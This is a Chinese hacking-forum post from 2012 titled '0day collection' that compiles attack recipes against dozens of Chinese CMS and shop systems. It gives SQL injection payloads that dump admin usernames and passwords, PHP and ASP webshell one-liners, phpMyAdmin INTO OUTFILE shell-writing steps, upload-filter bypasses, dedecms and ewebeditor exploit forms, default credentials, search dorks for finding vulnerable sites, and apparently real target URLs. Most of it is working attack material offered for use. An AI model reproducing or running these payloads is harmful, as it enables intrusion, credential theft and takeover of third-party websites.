找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2888|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本& _. z. O& s9 P" n  @7 ~) E) g
% H! \  H6 N* c( |
直接上exploit:3 D$ t8 @; Y$ V8 M
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
# h1 C3 U( ~" \! |. ^7 Ttest:http://www.tb11.net/system/xitong/shownews.asp?id=210
, h2 h2 g7 N, S% |  e5 t# y! @--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
9 S! `! ^' G- kAsprain论坛 注册用户 上传图片就可拿到webshell; V! ~% \; u' H0 ?& K

# N* |4 A7 C( c5 {' R5 U* |Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。9 f0 k7 @* E/ z) @- V; D% I
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>$ c" L6 d" {- }, c( r4 m
2.gif 为一小图片文件,一定要小,比如qq表情图片
/ e# M% l- S, \$ H5 P" {6 \( @9 @3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用2 r0 j: V4 d. k" I! P
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了2 Y8 b- ]8 G/ ~# j% o8 M
5.q.asp;.gif
7 h' @8 b# S5 ]' [, Ngoogle:Powered by Asprain+ b! a, d# k. U& y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ c; }' C1 Y4 p! i8 _0 K
+ j1 g2 s0 e. s+ Z' ^2 u' m( _: |ShopNum1全部系统存在上传漏洞。8 ^  H$ G6 j' w* c* X
6 T; M9 O5 s8 U+ V# s/ ~) l
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。, E9 X3 n7 d( e6 n% C
按说明 提示登录后台。。
& B+ V5 y* V) k; s9 Z  B6 M在后台功能页面->附件管理->附件列表
- m; ^4 Y% k8 I0 g. @/ W可以直接上传.aspx 后缀木马
0 h+ X6 F1 E+ S# P: jhttp://demo.shopnum1.com/upload/20110720083822500.aspx
' l1 e- y8 E' G9 s--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: ~, D2 U& G) a4 b2 E: I
8 U- u, H. |- v) Z# {' W* z
牛牛CMS中小企业网站管理系统 上传漏洞0 r. J4 G. f  S8 r( W

+ A8 u$ h$ \7 R$ a8 a8 R$ J/ P牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
. T8 P9 _2 I! S5 G0 T5 c6 P4 j& X后台:admin/login.asp) {  a  _# g# y, d5 J+ Z, g
ewebeditor 5.5 Nday
2 J: U; [( [, ~+ |9 u$ {- fexp:
5 P( l( b' ?, T# a! H, w<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
6 Z% B; I0 B1 l+ p$ D<input?type=file?name=uploadfile?size=100><br><br>?
' D* n& p9 Q1 n/ m3 \<input?type=submit?value=upload>?
! e, ]( [4 v$ A9 V$ ~</form>
* ~# _/ V+ D) P, D' p5 rps:先上传小马." q. S9 X; x* a5 i- }1 l& J% n
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
  y& b- p  o3 W8 z/ a$ U! ?4 s$ s$ i6 L- O8 p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) s1 X" W* q6 s3 ~6 G& I
8 H; s& U5 ?$ jYothCMS 遍历目录漏洞( d- F- Z* B# d' k  V2 {; e3 L& S

3 I! J  O* o+ K优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。2 b, S1 K1 l& T! D
默认后台:admin/login.asp7 U- Z: }$ q0 a4 |# b0 u
遍历目录:' ?! r# j" ?6 p5 W% Z
ewebeditor/manage/upload.asp?id=1&dir=../
/ d2 s, f, L) t/ {8 ]data:
% F1 V" Y9 h1 Q- Vhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa
) E( [9 w5 E) F--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 W1 p. P& k$ C) b! w3 ?/ \

( |* P# D9 ]: X; Z  ^Net112企业建站系统 1.09 b6 [4 s0 r8 Z5 ]2 C  |9 p* l

& \7 H' \1 x2 f; q* l- ^源码简介:6 b4 q7 n% g% i  ^8 P  V
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
9 L. F( k9 y1 S# a2 }7 \2 }添加管理员:
0 D; P5 C( q/ J$ v/ P: {0 n+ Phttp://www.0855.tv/admin/admin.asp?action=add&level=2
+ L/ f/ z$ `6 A/ X; @# B% C7 A9 G- X其实加不加都不是很重要,后台文件都没怎么作验证。
$ @" |& l( P2 h3 Q5 ~' l, Q) i上传路径:- S% K+ _1 R& @
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
1 A; W( K( I) O2 N# B- p$ bhttp://www.0855.tv/inc/Upfile.asp?Stype=2
, X* ?( @7 w3 Y  a怎么利用自己研究。0 q  \7 ^+ t8 |7 B+ d+ I
遍历目录:
" v5 p0 O3 F0 Khttp://www.0855.tv/admin/upfile.asp?path=../..
) p6 s8 W4 ]6 ]) a) N/ b如:
4 @2 g6 \4 h- Zhttp://www.0855.tv/admin/upfile.asp?path=../admin
  ~; b' t' q8 \' s$ ^http://www.0855.tv/admin/upfile.asp?path=../data- [& `  z( k+ V9 N# v( m) Y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. d( }9 r; S6 L: V9 d# o% O( v* p! S1 b) n2 C$ K/ Q4 ^
易和阳光购物商城通杀 上传漏洞
' b$ e; D' k2 }
( I' l- w# A. K7 v1 h前提要求是IIS6.0+asp坏境。/ o2 f5 ?0 O$ K4 K
漏洞文件Iheeo_upfile.asp / `3 o: N, h( I# r! |* Q
过滤不严.直接可以iis6.0上传& j* }7 [% h) j6 M" k6 V; X/ g) E
把ASP木马改成0855.asp;1.gif
  @1 U' G; I  b8 a4 R直接放到明小子上传
  B" F) {1 u1 p8 [4 a0 kGoogle搜索:inurl:product.asp?Iheeoid=3 M( h: y& ^; l, R$ K
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ d+ H5 D" ], M+ r8 i8 }/ X( E) h8 k1 X) k) i/ t
phpmyadmin后台4种拿shell方法7 T" U) S' D1 F' B& p, D$ K
3 L- W9 m$ V9 Q2 _
方法一:
5 q# J5 D+ h4 b* VCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
0 I# h8 e$ L3 p0 ^: P! K2 ZINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');& a- T: s$ }. ?. {: q' {1 L/ {$ E" x
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
3 k: l. ^3 K  j# s, B$ U----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
3 \7 }4 }& f3 a& p5 Q0 d1 V一句话连接密码:xiaoma
# A2 H  m& ]( ~5 a' @1 I方法二:; z/ ^! K" r6 f  T$ Q
Create TABLE xiaoma (xiaoma1 text NOT NULL);% m: v0 |8 w- ~. F) W) Y: f
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');7 V* A6 |4 h4 c8 w. ~* y* J
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
( M: ~: c0 i+ B! S7 hDrop TABLE IF EXISTS xiaoma;
1 \- y' q% j) }0 k( a: e8 @方法三:
4 n9 w* }2 T$ s& ~( I读取文件内容:    select load_file('E:/xamp/www/s.php');
# p. `, h' z: T8 t2 W7 B3 L写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
# o2 N2 O8 l6 i$ C+ @) j3 ~) Qcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
) s7 ~: m" T3 e1 {) I2 F2 \, O方法四:
) R. p7 G! ^4 k# iselect load_file('E:/xamp/www/xiaoma.php');
8 {8 I8 t7 |& @+ I$ wselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'3 a5 r$ R8 p4 e) m% U
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
* T  _% a# N/ Y( w: v1 I1 J- t: }/ J--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 E% g8 c0 H% b7 p6 S* ?3 T
* N. @0 l' G, P# B传信网络独立开发网站源码0day漏洞
) ~3 p  l3 f: [2 Y
  A# ]% i' o1 v* ?# @6 Z/ D5 b后台system/login.asp
/ O3 G& M+ b+ D: Y+ r进了后台有个ewebeditor
8 y  Z* a; J" Z* T2 \4 aGoogle 搜索inurl:product1.asp?tyc=
: e3 m" R1 z4 i/ {; T  [编辑器漏洞默认后台ubbcode/admin_login.asp
; l9 h2 f* d& x7 h8 ?) o数据库ubbcode/db/ewebeditor.mdb
4 P; [2 D- [; H0 J( A默认账号密码yzm 111111
! ]* \3 m( b4 l. ~" p% L3 K" X7 A6 C5 L7 m" r: O8 ^
拿webshell方法
7 L9 b7 z$ b5 X8 [0 f登陆后台点击“样式管理”-选择新增样式
2 e  N8 q2 Q5 s  S+ s" n2 U3 `样式名称:scriptkiddies 随便写
& h8 S5 G" J; z) N路径模式:选择绝对路径 . A. B+ I: o" \0 p3 U
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
, h% Q7 P# Q  I5 ~4 h5 Y6 X/ U' q图片类型比如就是我们要上传的ASP木马格式- H, I' W" ?+ I4 G9 P6 G% c
上传路径:/. O, h2 X4 b& I3 E! Q3 b" G9 L
图片限制:写上1000 免的上不了我们的asp木马5 A+ u8 b0 o+ ]
上传内容不要写
2 A( n: V9 C1 j# F* ]1 n可以提交了 1 g6 D4 o- X+ C
样式增加成功!
: [: K5 F" d3 n2 B, Q7 T9 s$ n- g* y返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 4 N- G! ?! E4 d1 Q" i# p
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
2 a  K/ W, `5 _/ o( y网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies. r% b8 C1 |. W
上ASP木马 回车 等到路径
6 Y7 d6 O4 i6 T: E7 Y6 e* X' ], I2 G* Z) l# z$ @
后台:system/login.asp
: G+ _) P+ _6 K% K3 OExp:6 ^# j& I' u" \; {0 |0 y( }
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master+ P' H, c& C% E) d+ V9 h( i
测试:
3 `+ Q1 `  j9 q% K" u8 q5 t  Ehttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master  p) a+ M0 @) ^" Q6 Q% y
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
% B' ~% d8 P% t- j--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 {- O. v3 y( @' y  ^
: _' g  |% Q, s# u
foosun 0day 最新注入漏洞
& o* p& C# z! u5 a  k$ }! A8 @. _9 N
3 |0 B: z0 T  ^漏洞文件:www.xxx.com/user/SetNextOptions.asp. J: v; q, D/ R5 ?5 L" b
利用简单的方法:& j" Z& v. v3 `% P* e
暴管理员帐号:
7 ^+ j- w' J& r: |http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
* u9 `, Y; e3 m6 d9 M0 c( s- i. m暴管理员密码:" }6 j, A0 f1 T% w; ]
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,! a, `" n+ ^  H
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 D4 H( l: i' Y9 h2 V

: ]8 \  l' K7 O* h& N- ?网站程序的版权未知!$ U3 i* Y# I5 O5 u8 e
3 k7 m% Z6 e( w# O
默认网站数据库:
4 {* h& E- M1 o; Y2 q; B% Wwww.i0day.com/data/nxnews.mdb& r" u' @* ?, k+ `
ewebeditor 在线编辑器:
  t8 D- r( g: e' U, U% F编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb- ?. H  d1 b# V7 r7 s1 x' `
登录地址:ewebeditor/admin_login.asp. g6 j/ U( ~6 j% \8 B2 f% h
默认密码:admin  admin
2 a! N+ v* ?% L. K  U3 g登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data3 n6 X# G2 w( ?$ u2 \0 V- C! t
/ B- M0 e8 s5 l& ~
Sql注入漏洞:
9 g7 p* W1 ]! e) Ahttp://www.i0day.com/detail.asp?id=120 L( [+ a- F5 V( J% }
exp:
4 {) W7 ^2 P" A1 k4 Y# A6 S: Cunion select 1,admin,password,4,5,6,7,8 from admin7 A. |' ~* C3 j- s# l' M( F8 S
爆出明文帐号/密码
6 q/ ?! P0 R/ R2 }* ~4 v9 k4 `3 T1 q
上传漏洞:+ D- R4 s; C- _& V4 }3 R1 h
后台+upfile.asp5 v7 j8 `1 z' L) o# z4 J
如:
9 I+ S) w& ]1 w/ x' lhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
/ _4 Y4 X) @9 v$ G2 Bshell的地址:网址+后台+成功上传的马
1 K: W) c" M/ j& E# i+ _# Z  S1 ngoogle:inurl:news.asp?lanmuName=/ q/ }4 D& g7 A9 G. i% B0 |
------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 p, I) E% P1 k
6 N4 R" i+ J/ n' |' \
dedecms最新0day利用不进后台直接拿WEBSHELL) G: ]& v% R+ K5 L
. A6 B) ^# J; V3 p" t* f+ c+ u* v
拿webshell的方法如下:
0 ?( H% [) ^0 M: Z! o8 A1 ^  U网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
3 v9 o+ z5 _1 m3 o' ]" f) U, x前题条件,必须准备好自己的dede数据库,然后插入数据:& f2 u+ j2 x; v0 @* p5 A
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); 4 ]* S: z- ~/ N9 }6 c
7 v* y3 G+ }8 i$ I$ A: E
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
) F% w' z& ~# E+ u<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
+ p/ l  C- w% f# K" ?4 J<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />+ X0 Z4 F4 f+ C% c9 ]7 l
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
- y' ^$ Q7 F# [$ _<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />% s, S( _( k* f
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
' ^- ~5 e$ C- M5 a9 s7 P& T% s, h<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
  n; o8 y* r) ~3 i9 g<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />9 V1 M* q; x& B% P% v. N# I
<input type="text" value="true" name="nocache" style="width:400">
* _. d' o2 |9 O5 g  b<input type="submit" value="提交" name="QuickSearchBtn"><br />9 s* H8 D+ }& m$ i. L
</form>
3 N$ O' k" \# u, _$ q+ i. z0 e; d<script>
9 @0 i7 [9 S- [6 t# f  mfunction addaction()" d. e; J' |/ t( k# |: Q
{
; r+ B0 v4 W8 _' ~( zdocument.QuickSearch.action=document.QuickSearch.doaction.value;8 \/ `/ M+ E: j+ X8 e, s
}4 H5 E# G* i6 M
</script>
) F" d* }- x1 P9 F-----------------------------------------------------------------------------------------------------------------------------------------------; O6 e6 L! h/ S  E
" @2 ~/ O  L. _! S
dedecms织梦暴最新严重0day漏洞
! |2 i2 w! @1 H3 l9 jbug被利用步骤如下:- Z8 b0 L, O* ^  i4 i4 O7 \8 x: a
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root  x) O2 G& g+ C
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。1 g" N  r; P' h- r
-------------------------------------------------------------------------------------------------------------------------------------------
7 X1 y, k" B& L- R0 h
* r; w$ R5 ^( y6 _6 o多多淘宝客程序上传漏洞
$ a- E5 m: ^* I& O( m7 }5 j0 l7 I漏洞页面:* @2 d/ r1 Q7 Q, L% J
admin\upload_pic.php
6 w2 n; Z# x$ B; r! m( P传送门:
+ |3 l+ N% V, V: I9 Ihttp://www.www.com/admin/upload_pic.php?uploadtext=slide1
/ @8 f0 {$ I3 U! Z" |$ J- lPS:copy张图片马 直接  xxx.php 上传抓包地址!
, `/ @( n/ _! p3 R" `------------------------------------------------------------------------------------------------------------------------------------------------------) d2 X* H, n" n  `3 N* ^

/ J& X" k: [4 g' ]- v6 C9 B无忧公司系统ASP专业版后台上传漏洞
+ J2 m; ~0 ^  f2 x& k# S漏洞文件 后台上传
% p: O* @% x7 h8 ^+ Z0 cadmin/uploadPic.asp4 `# ]% x; ]  x* j# t8 J6 J0 o3 `
漏洞利用 这个漏洞好像是雷池的
7 M" o4 k! C, j5 \  Jhttp://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
' A. t8 l  X9 F3 m2 p/ _4 ^等到的webshell路径:" p& ]! H3 I2 L7 w$ b& C* T
/UploadFiles/scriptkiddies.asp;_2.gif% M/ C- p+ Z1 h2 @; A6 q' G! I
---------------------------------------------------------------------------------------------------------------------------------------------------
; _& @) V3 Q5 q# Y- O: _+ ^7 ~$ S/ g% S" t- p$ g/ W8 t
住哪酒店分销联盟系统2010
& T. j0 k' H) O- F/ Z* xSearch:
9 z( A0 Z4 U+ B% w# Cinurl:index.php?m=hotelinfo' S$ c0 p! n1 r' b, @
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin8 B: ?* m8 X0 I8 _
默认后台:index.php?m=admin/login
* U0 q; T, k* T! I# \- q--------------------------------------------------------------------------------------------------------------------------------------------------
! l% R6 S$ V1 f* N4 N8 ^! w4 ~5 ], \8 p8 ^; f
inurl:info_Print.asp?ArticleID=% R& K8 @2 G4 |2 c. z) g
后台 ad_login.asp6 |/ x2 Q/ i# Q% G
爆管理员密码:
( v, _1 U) S/ c$ N+ Cunion select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
7 ]# ?% @9 R. g' ~* f  J: |------------------------------------------------------------------------------------------------------------------------------------------------------------
8 t8 ^$ K3 B8 c4 r+ h) g3 ?" e6 Z
) c* M, |% Y# A0 \* \搜索框漏洞!5 I+ S, }4 B/ t+ B1 `
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='$ B" T" i, w; N7 f! {. [/ [
--------------------------------------------------------------------------------------------------------------------------------------------------------
  Z4 v4 D: j! @$ I  v! ^: V1 m% `2 W
关键字:
' [0 W0 n" p" ainurl:/reg_TemletSel.asp?step=2, l, L. p3 [: i4 q; h6 V) p
或者
% q! d! c* l$ b# C电子商务自助建站--您理想的助手
; x( A1 A- `4 M* }+ r+ i, s% {& e- H-------------------------------------------------------------------------------------------------------------------------------------------------
8 i  t: O' [6 b+ w( O. ]" V# H8 K1 A# O
iGiveTest 2.1.0注入漏洞- X) W3 K" r- @- u
Version: <= 2.1.0% \. J+ r- i$ m: G; y. _0 s; I2 G9 ^
# Homepage: http://iGiveTest.com/( I, j3 O% O: N" ?$ h3 {  {
谷歌关键字: “Powered by iGiveTest”8 s3 E* l: E. q& \* ~/ S
随便注册一个帐号。然后暴管理员帐号和密码; T6 [( g8 h, g- b9 T+ P* x1 B
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
# }3 d; Y9 d* p( C- w& Y------------------------------------------------------------------------------------------------------------------------------------------------3 a8 o! T  R; d1 f, I0 E

0 U# r# [' _& L$ V- u' H+ gCKXP网上书店注入漏洞
/ q/ b+ E/ K- q: I4 ?' Q" |$ H工具加表:shop_admin 加字段:admin
' X9 }2 Y; k% H! _$ _( I, k3 F后台:admin/login.asp ' I" A) K; [/ p) O) t* X
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
- b) v/ S8 w4 B$ H1 R$ N: zinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
$ j+ s$ A3 v9 _5 F6 E  l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 n% N- \1 c! X- ^8 |1 Q& S. S

2 ?( b) k; y  O段富超个人网站系统留言本写马漏洞
* O$ ~* E% Q# g, v源码下载:http://www.mycodes.net/24/2149.htm  W: M  Q" o5 k
addgbook.asp 提交一句话。
7 t; p8 J8 v' n5 k: S3 {% W* e连接: http://www.xxxx.tv/date/date3f.asp) W1 W& x9 C% T, e
google:为防批量,特略!. [4 Q- r& ^* \: I9 L% }) F
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 v' |+ r& i6 @/ `. z. @* q( v8 S5 T
* [; Y: ?. g: y3 u3 I* z3 P7 M  }
智有道专业旅游系统v1.0 注入及列目录漏洞+ B' o% ]' ?7 J; t6 S" y
默认后台路径:/admin/login.asp
* \- F2 f+ U, e/ ]# w2 c  ]! W: U9 _默认管理员:admin9 a7 c* Z3 ]  v2 j; o! w  Z, X
默认密码:123456
  j$ p# m* @" m( qSQL EXP Tset:. W( z) z/ _" Y+ \# _4 R8 O
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
" G  }- `7 V0 w2 R! J- C------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ p" a: {) W  H2 U: i$ t

: r. M4 ]7 o9 ?5 m4 j; c) K0 B& {) Eewebeditor(PHP) Ver 3.8 本任意文件上传0day
+ d/ t4 }% F5 v; WEXP:) Q' w! j8 A7 D, {& u- n
<title>eWebeditoR3.8 for php任意文件上EXP</title>
' X; @6 @0 ?5 G<form action="" method=post enctype="multip- R5 R& t; P$ o3 P5 j: u
art/form-data"> ( @4 w; p! O$ }1 y# N% H! K
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> " {5 S: F" S* H( V
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
  J9 E2 \3 a) I, u5 z<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> 3 a  d+ {( b" [2 d1 w8 i' e
file:<input type=file name="uploadfile"><br> ; B# V9 H* j- i  f' i
<input type=button value=submit onclick=fsubmit()>
  }1 Y& ~1 H& P$ @+ Q- k/ G: S</form><br> " y1 t: X0 h, `0 J
<script>
0 E: N* O% }2 K- h: s( @) ~function fsubmit(){
6 a; c1 M$ h( z4 ^4 S! i+ G( q  ?form = document.forms[0];
: |/ B- B  J* q0 jform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; ( k8 s+ A, D* f  R: _% m7 f
alert(form.action);
- |( E. E! ]5 e. i. Nform.submit();
& `$ J2 D1 P$ F  {/ m3 t}
0 z$ h; W- e* A' Y</script>
' g- L; l! w4 Y! d  ^" K, S$ R4 q6 i注意修改里面ewebeditor的名称还有路径。
5 g% Z, [* C6 A3 h& ]/ d3 ~' Q: d---------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ }8 e% Y8 A  o0 }
0 L9 }' Y0 Y8 g% {, M
提交’时提示ip被记录 防注入系统的利用
4 L" D3 ]1 G  ]& D8 z0 O0 P$ E4 r; v网址:http://www.xxx.com/newslist.asp?id=1227 |0 C- F7 T! O& q* U( u6 a
提示“你的操作已被记录!”等信息。8 @$ L0 H# _; S  X4 \1 p2 P- B
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
% f/ p5 y0 [- c! m2 c5 j0 W* z-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ l1 c3 @' z1 r0 A* r, _/ C, Q
9 |! N/ W$ V0 X5 l! [. }  a. d
西部商务网站管理系统 批量拿shell-0day
5 h( I3 p- t' w. L: _这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
& q' O) J, X5 [$ l1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛1 g( |' L7 u8 k$ h. K
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合, c  t3 s4 ?' v8 O4 \
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂+ A* t7 n3 }8 w; w( @1 Q6 [% Q
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------. C& I3 @# E& S; V+ W" {+ W
- M$ x1 q1 V4 Q. {3 Z" [) F# c
JspRun!6.0 论坛管理后台注入漏洞# k0 Q4 l3 [! g' X( ?
( ?- @; D3 W) i
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:5 d5 X1 |2 E2 I  n) }
JspRun!6.0
% D) v+ Q1 P- k  [4 {3 ~" Y漏洞描述:" ]' r9 K' _4 @$ n$ o
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
  a2 N) I3 [' b, h4 i2 `  ]在处理后台提交的文件中ForumManageAction.java第1940行
  Y9 z& u3 e- @& b7 c+ _1 VString export = request.getParameter("export");//直接获取,没有安全过滤
% [' o( F. r9 }* Y' _if(export!=null){& s: v( I4 n9 q+ N! ~3 \7 @
List&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...6 v; A1 T1 ]" ?6 n5 D2 i% A
if(styles==null||styles.size()==0){
/ V& L9 ]5 N; j% o, O* m- h7 C<*参考2 l$ i$ t0 p- z$ o) D" \1 ]  S
nuanfan@gmail.com
5 U/ L% N) ?. u*> SEBUG安全建议:3 k0 w/ S' n5 n4 @! z0 S8 K+ H- Q8 @6 v7 f
www.jsprun.net
+ O6 v+ w; y% ^+ E1 k: W(1)安全过滤变量export
- y3 o, i& O, v- @(2)在查询语句中使用占位符$ P9 X( F! W5 H2 _; |+ T) C8 [2 X
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------: d+ }3 c5 j' G
! b/ K) u) e* N' i
乌邦图企业网站系统 cookies 注入; I) h1 Q5 H; `: Z

' X# H2 f6 I6 a- d% G3 n2 ~程序完整登陆后台:/admin/login.asp/ T! i: W9 E( |- u- V! W
默认登陆帐号:admin 密码:admin888
- _3 Z  q: ]) u5 ~! k2 d# N语句:(前面加个空格)
+ I# X+ V. g$ z4 x5 J$ Hand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin* Z; h3 s5 \/ c# b1 S# n
或者是16个字段:7 D, Y+ _' X! o/ h1 I
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin" I, u0 p% a6 |4 [4 |
爆不出来自己猜字段。
& m% c% Q8 t' p# ]% |& E注入点:http://www.untnt.com/shownews.asp?=88+ J6 x; `2 H8 t3 F
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp/ }; }' n, d4 h
关键字:& P5 s& a8 L$ {* [. h
inurl:shownews?asp.id=
! X& f3 v4 A, c- E1 a# S* J-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, T# {+ J7 |7 C( Z: z9 ]4 q3 m
+ S; b+ |  o$ b/ o' a/ J+ u7 Y
CKXP网上书店注入漏洞; I0 J$ B+ s( \$ w( J, E5 D
: F$ d$ e) k; R5 Z
工具加表:shop_admin 加字段:admin
5 [$ p1 U# u  N$ a# x9 I' E后台:admin/login.asp 9 G9 Y4 v  n7 S5 J! T# a  L& K* B$ s
